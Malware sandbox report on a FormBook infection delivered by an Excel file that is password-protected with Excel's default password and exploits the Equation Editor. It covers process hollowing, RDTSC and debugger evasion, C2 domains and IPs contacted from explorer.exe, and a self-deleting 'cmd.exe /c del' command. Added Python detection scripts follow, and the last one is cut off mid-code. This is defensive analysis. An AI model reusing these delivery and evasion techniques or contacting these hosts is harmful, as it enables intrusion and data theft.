          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3DF5C appears 130 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3E2A8 appears 60 times
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook (metadata below)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rules: Formbook_1 and Formbook
Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE; Matched rules: Formbook_1 and Formbook
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rules: Formbook_1 and Formbook
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rules: Formbook_1 and Formbook
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rules: Formbook_1 and Formbook
Rule metadata:
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSX@9/28@12/9
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_004020A6 CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$Bank Details.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVREA8D.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts (reported five times)
Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
(The EQNEDT32.EXE > vbc.exe, vbc.exe > vbc.exe and help.exe > cmd.exe entries are listed twice in the report. The -Embedding switch shows that EQNEDT32.EXE was started as an out-of-process COM server for the embedded equation object, which is why its parent is recorded as unknown rather than EXCEL.EXE. The full chain is EXCEL.EXE > EQNEDT32.EXE > vbc.exe dropped to C:\Users\Public > second vbc.exe instance > injection into explorer.exe > help.exe > cmd.exe deleting the dropper.)
Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Bank Details.xlsx; Static file information: File size 2370560 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb; source: vbc.exe, help.exe
Source: Binary string: help.pdb; source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
Source: Bank Details.xlsx; Initial sample: OLE indicators vbamacros = False
Source: Bank Details.xlsx; Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe; Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\Public\vbc.exe; Code functions (5_2_*) beginning with push/return pairs: 5_2_00416090 push edi; ret | 5_2_00407101 push cs; iretd | 5_2_00416104 push ds; retf | 5_2_0041CA5A pushfd; retf | 5_2_004162ED push es; iretd | 5_2_0041B3C5 push eax; ret | 5_2_0041B47C push eax; ret | 5_2_0041B412 push eax; ret | 5_2_0041B41B push eax; ret | 5_2_00415EC4 push edx; ret | 5_2_00415FA8 push esp; iretd | 5_2_0095DFA1 push ecx; ret
Source: C:\Users\Public\vbc.exe; Code functions (5_1_*): 5_1_00416090 push edi; ret | 5_1_00407101 push cs; iretd | 5_1_00416104 push ds; retf | 5_1_004162ED push es; iretd | 5_1_0041B3C5 push eax; ret | 5_1_0041B47C push eax; ret | 5_1_0041B412 push eax; ret | 5_1_0041B41B push eax; ret | 5_1_0041CA5A pushfd; retf | 5_1_00415EC4 push edx; ret | 5_1_00415FA8 push esp; iretd
Source: C:\Windows\SysWOW64\help.exe; Code functions (7_2_*): 7_2_00B3DFA1 push ecx; ret | 7_2_00096090 push edi; ret | 7_2_00087101 push cs; iretd | 7_2_00096104 push ds; retf | 7_2_000962ED push es; iretd | 7_2_0009B3C5 push eax; ret | 7_2_0009B41B push eax; ret | 7_2_0009B412 push eax; ret
(Two-byte push/return pairs at function entry points are not compiler output; they are typical of packed or junk-padded code, and "push reg; ret" is a jump through a register that breaks naive control-flow recovery. The help.exe addresses are the vbc.exe ones rebased from 0x400000 to 0x80000, i.e. the same unpacked image once it has been hollowed into help.exe, matching the Yara hit on region 0x80000 of process 7 below.)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe (dropped file; listed twice in the report)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe (dropped file)
Source: C:\Users\Public\vbc.exe; File created: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll (dropped file)
(The Content.IE5 cache path shows the payload was fetched through WinINet and then copied to C:\Users\Public\vbc.exe. The .ndata section of the unpacked PE and the nsXXXX.tmp plugin directory are characteristic of an NSIS installer wrapper around the FormBook payload.)
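A static scan for the push/return pairs listed under Data Obfuscation, as an added triage example (this is not code from the report or from the sample). The byte buffer is constructed for the demonstration; the opcode tables are the genuine single-byte x86 encodings for 32-bit code, and the 0x400000 base is only chosen to mirror the report's addresses.

```python
"""Scan raw x86 bytes for adjacent "push <reg|seg|flags>; ret/retf/iretd" pairs
of the kind the sandbox lists (5_2_00416090 push edi; ret, 5_2_00407101
push cs; iretd, 5_2_0041CA5A pushfd; retf).  A compiler never emits these at
a function entry; clusters of them mark packer stubs, junk padding or
misaligned code, and "push reg; ret" is a jump through a register.

Added example, not code from the report or the sample.  The buffer below is
constructed; the opcode tables are the real single-byte x86 encodings.
"""
from __future__ import annotations

PUSH_OPCODES = {
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x9C: "pushfd",
}
# 0xCF is iret, which 32-bit disassemblers print as iretd (as the report does).
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(blob: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (virtual address, 'push x; ret') for every adjacent pair."""
    hits = []
    for i in range(len(blob) - 1):
        push = PUSH_OPCODES.get(blob[i])
        ret = RET_OPCODES.get(blob[i + 1])
        if push and ret:
            hits.append((base + i, f"{push}; {ret}"))
    return hits


def pairs_per_kib(blob: bytes, base: int = 0) -> float:
    """Density score (pairs per KiB) for ranking sections of a dump."""
    if not blob:
        return 0.0
    return len(find_push_ret(blob, base)) * 1024 / len(blob)


def build_sample() -> bytes:
    """Constructed 0x50-byte region: a normal prologue/epilogue that must not
    be flagged, plus four push/return pairs at fixed offsets."""
    buf = bytearray(b"\x90" * 0x50)          # nop filler
    buf[0:6] = b"\x55\x8b\xec\x83\xec\x10"   # push ebp; mov ebp,esp; sub esp,10h
    buf[6:8] = b"\xc9\xc3"                   # leave; ret (legitimate epilogue)
    buf[0x10:0x12] = b"\x57\xc3"             # push edi; ret
    buf[0x20:0x22] = b"\x0e\xcf"             # push cs; iretd
    buf[0x30:0x32] = b"\x9c\xcb"             # pushfd; retf
    buf[0x40:0x42] = b"\x50\xc3"             # push eax; ret
    return bytes(buf)


if __name__ == "__main__":
    for addr, text in find_push_ret(build_sample(), base=0x400000):
        print(f"{addr:08X} {text}")
```

Run it over the .text section of an unpacked dump (the 5.2.vbc.exe.400000.0.unpack file from the report, for instance) with the section's virtual address as base. The scanner is byte-level, so a pair can also be data or the tail of a longer instruction; treat a high density per KiB as the signal, not a single hit, and note that the `push imm32; ret` jump idiom (opcode 0x68) is deliberately not matched.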

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe (dropped file)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (reported ten times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX (reported nine times)
Source: C:\Users\Public\vbc.exe; Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Windows\SysWOW64\help.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: Bank Details.xlsx; Stream path 'EncryptedPackage' entropy: 7.99971479672 (max. 8.0)
(An EncryptedPackage stream at this entropy is the normal appearance of an OOXML document wrapped in Office's file encryption. Together with the OLE indicator encrypted = True and the VelvetSweatshop tag it shows the workbook is password-protected with the default password that Excel applies silently, so the exploit document is opaque to static scanners until it is decrypted. No persistence mechanism is recorded in this section despite its heading.)
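A triage check for the two indicators above (OLE container with an EncryptedPackage stream, and near-maximal stream entropy), as an added example that is not part of the report. The sample bytes are constructed here (a CFB header, one directory name and a SHA-256 chain standing in for ciphertext); real files should be parsed with a proper compound-file library, and only the signature-level checks are shown.

```python
"""Triage for 'OLE indicators encrypted = True' and a high-entropy
EncryptedPackage stream: an .xlsx that is really an OLE2 compound file
holding an EncryptedPackage stream is an Office-encrypted OOXML document.
Excel opens such a file without prompting when the password is the built-in
default "VelvetSweatshop", which is the trick this sample is tagged with.

Added example, not from the report.  The sample bytes are constructed.
"""
import hashlib
import math

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"
# CFB directory entries store stream names as UTF-16LE.
ENCRYPTED_PACKAGE = "EncryptedPackage".encode("utf-16-le")
DEFAULT_PASSWORD = "VelvetSweatshop"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0 (the report quotes 7.9997 for the stream)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_office_file(data: bytes) -> str:
    """'ooxml-plain' (zip), 'ooxml-encrypted' (CFB wrapper naming an
    EncryptedPackage stream), 'ole2' (legacy binary format) or 'unknown'."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml-plain"
    if data.startswith(OLE2_MAGIC):
        return "ooxml-encrypted" if ENCRYPTED_PACKAGE in data else "ole2"
    return "unknown"


def triage(data: bytes, entropy_threshold: float = 7.9) -> dict:
    """Combine the container check with the entropy measurement."""
    kind = classify_office_file(data)
    entropy = shannon_entropy(data)
    flags = []
    if kind == "ooxml-encrypted":
        flags.append(f"encrypted OOXML wrapper: try default password {DEFAULT_PASSWORD}")
    if entropy >= entropy_threshold:
        flags.append(f"high entropy {entropy:.3f}: encrypted or packed content")
    return {"kind": kind, "entropy": round(entropy, 3), "flags": flags}


def build_sample(payload_len: int = 65536) -> bytes:
    """Constructed stand-in for an encrypted .xlsx (no FAT, no real directory):
    a 512-byte header, the stream name, and a SHA-256 chain as ciphertext."""
    header = OLE2_MAGIC.ljust(512, b"\x00")
    directory = ENCRYPTED_PACKAGE.ljust(128, b"\x00")
    state, chunks, total = b"constructed-sample", [], 0
    while total < payload_len:
        state = hashlib.sha256(state).digest()
        chunks.append(state)
        total += len(state)
    return header + directory + b"".join(chunks)[:payload_len]


if __name__ == "__main__":
    print(triage(build_sample()))
```

The report measured the entropy of the EncryptedPackage stream alone; this check measures the whole file, which is slightly lower because of the header and directory. Once the wrapper is recognised, decrypt with the default password before running any further static analysis, for example `msoffcrypto-tool 'Bank Details.xlsx' decrypted.xlsx -p VelvetSweatshop`, and point the equation-object checks at the decrypted ZIP.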

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe; RDTSC instruction interceptor: first address 00000000004085F4, second address 00000000004085FA; instructions: rdtsc / xor ecx, ecx / add ecx, eax / rdtsc
Source: C:\Users\Public\vbc.exe; RDTSC instruction interceptor: first address 000000000040898E, second address 0000000000408994; instructions: rdtsc / xor ecx, ecx / add ecx, eax / rdtsc
Source: C:\Windows\SysWOW64\help.exe; RDTSC instruction interceptor: first address 00000000000885F4, second address 00000000000885FA; instructions: rdtsc / xor ecx, ecx / add ecx, eax / rdtsc
Source: C:\Windows\SysWOW64\help.exe; RDTSC instruction interceptor: first address 000000000008898E, second address 0000000000088994; instructions: rdtsc / xor ecx, ecx / add ecx, eax / rdtsc
Source: C:\Users\Public\vbc.exe; Code function: 5_2_004088C0 rdtsc
(Two rdtsc reads six bytes apart: the low 32 bits of the first are kept in ecx and compared with the second, so an inflated delta reveals single-stepping, emulation or a hypervisor that traps rdtsc. The help.exe addresses are again the vbc.exe offsets rebased to 0x80000.)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552; Thread sleep time: -360000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2884; Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 260; Thread sleep time: -32000s >= -30000s
Source: C:\Windows\explorer.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe; Last function: Thread delayed
Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_004026BC FindFirstFileA,
VMware device identifiers found in process memory (these are the analysis VM's own hardware strings; the report does not show the sample querying them):
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2191497413.0000000004263000.00000004.00000001.sdmp; Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD01
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2184668586.00000000004D4000.00000004.00000020.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp; Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000002.2373391560.0000000000231000.00000004.00000020.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe; Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe; Process queried: DebugPort (NtQueryInformationProcess with ProcessDebugPort, a standard debugger check)
Source: C:\Windows\SysWOW64\help.exe; Process queried: DebugPort
Source: C:\Users\Public\vbc.exe; Code function: 5_2_004088C0 rdtsc
Source: C:\Users\Public\vbc.exe; Code function: 5_2_00409B30 LdrLoadDll,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_02E21667 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe; Code function: 4_2_02E2187F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe; Code function: 5_2_00940080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe; Code function: 5_2_009400EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe; Code function: 5_2_009626F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h]
(fs:[30h] is the PEB in 32-bit processes; direct reads of it are used for the BeingDebugged flag and for walking the loader lists without calling GetModuleHandle, which fits the LdrLoadDll and GetProcAddress-based API resolution listed above.)
Source: C:\Users\Public\vbc.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe; Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.thunderoffroadresort.com
Source: C:\Windows\explorer.exe; Domain query: www.18598853855.com
Source: C:\Windows\explorer.exe; Domain query: www.stone-master.info
Source: C:\Windows\explorer.exe; Network Connect: 144.76.242.196 80
Source: C:\Windows\explorer.exe; Domain query: www.qcmax.com
Source: C:\Windows\explorer.exe; Domain query: www.thesixteenthround.net
Source: C:\Windows\explorer.exe; Domain query: www.christlicheliebe.net
Source: C:\Windows\explorer.exe; Network Connect: 104.128.125.95 80
Source: C:\Windows\explorer.exe; Network Connect: 18.166.77.19 80
Source: C:\Windows\explorer.exe; Domain query: www.hostvngiare.com
Source: C:\Windows\explorer.exe; Domain query: www.starr2021.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Domain query: www.playfulpainters.com
Source: C:\Windows\explorer.exe; Network Connect: 3.230.51.235 80
Source: C:\Windows\explorer.exe; Network Connect: 198.54.117.212 80
Source: C:\Windows\explorer.exe; Network Connect: 104.21.71.76 80
(Nine distinct domains and seven plain-HTTP connections from the shell process in a single run: FormBook walks a list of mostly decoy domains alongside the live C2, so blocking any one domain achieves little; the durable alert is explorer.exe originating web traffic at all.)
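Detection logic run over the process-creation and network lines of this report, as an added example; the parsing and the rules are this example's own, not Joe Sandbox or Sigma code. The sample lines are copied from the report as extracted, where the Source column runs straight into the finding (the parser also accepts a "; " separator), and ROTATION_THRESHOLD is an assumed tuning value.

```python
"""Four detections over sandbox-style process and network lines: a child of
the Equation Editor (CVE-2017-11882 / CVE-2018-0802 pattern), execution out
of C:\\Users\\Public, self-deletion through cmd.exe /c del, and a system
process (explorer.exe) originating web traffic to many distinct domains.
Added example; the sample lines are copied from the report, the rules are not.
"""
import re
from collections import defaultdict, namedtuple
from typing import List, Optional, Tuple

Event = namedtuple("Event", "src kind image cmdline rest")

# Accepts 'Source: <src><Finding>:' (run together) and 'Source: <src>; <Finding>:'.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>unknown|.+?\.(?:exe|EXE))[;\s]*"
    r"(?P<kind>Process created|Domain query|Network Connect):\s*(?P<rest>.+)$"
)
IMAGE_RE = re.compile(r"(?P<image>.+?\.exe)\s*(?P<cmdline>.*)$", re.IGNORECASE)
SYSTEM_PROCESSES = {"explorer.exe"}  # shell process that should not originate web traffic
ROTATION_THRESHOLD = 5               # assumption: distinct domains per process before alerting


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse(line: str) -> Optional[Event]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    kind, rest = m.group("kind"), m.group("rest").strip()
    image = cmdline = ""
    if kind == "Process created":
        im = IMAGE_RE.match(rest)
        if im:
            image, cmdline = im.group("image"), im.group("cmdline").strip()
    return Event(m.group("src"), kind, image, cmdline, rest)


def detect(lines, rotation_threshold: int = ROTATION_THRESHOLD) -> List[Tuple[str, str]]:
    alerts, seen = [], set()

    def emit(rule: str, evidence: str) -> None:
        if (rule, evidence) not in seen:      # the report lists some events twice
            seen.add((rule, evidence))
            alerts.append((rule, evidence))

    domains, connects = defaultdict(set), defaultdict(set)
    for ev in filter(None, map(parse, lines)):
        src = basename(ev.src)
        if ev.kind == "Process created":
            child = basename(ev.image)
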